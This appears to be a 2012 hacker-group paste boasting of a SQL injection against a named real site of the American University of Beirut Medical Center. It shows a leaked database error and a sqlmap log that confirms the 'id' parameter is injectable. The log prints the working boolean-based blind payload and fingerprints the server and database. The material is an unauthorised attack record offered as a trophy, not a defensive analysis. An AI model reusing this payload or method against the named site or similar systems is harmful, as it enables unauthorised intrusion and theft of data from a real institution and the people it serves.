Islam-Hacker

aubmc.org.lb sql injection by jm511

Sep 10th, 2012
JM511 Was Here :)
Saudi Arabian Hackers
=========================
American University of Beirut
=========================
Injection vulnerability
=========================
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id = 40''.

/users/subpage.asp, line 10

aubmc.org.lb

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 20:29:14

[20:29:14] [INFO] using '/home/jm511/.sqlmap/output/www.intmed.aubmc.org.lb/session' as session file
[20:29:15] [INFO] testing connection to the target url
[20:29:16] [INFO] testing if the url is stable, wait a few seconds
[20:29:19] [INFO] url is stable
[20:29:19] [INFO] testing if GET parameter 'id' is dynamic
[20:29:20] [INFO] confirming that GET parameter 'id' is dynamic
[20:29:21] [INFO] GET parameter 'id' is dynamic
[20:29:22] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: Microsoft Access)
[20:29:22] [INFO] testing sql injection on GET parameter 'id'
[20:29:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:29:26] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[20:31:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 15 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=150 AND 485=485
---

[20:31:33] [INFO] testing Microsoft Access
[20:31:34] [INFO] confirming Microsoft Access
[20:31:36] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access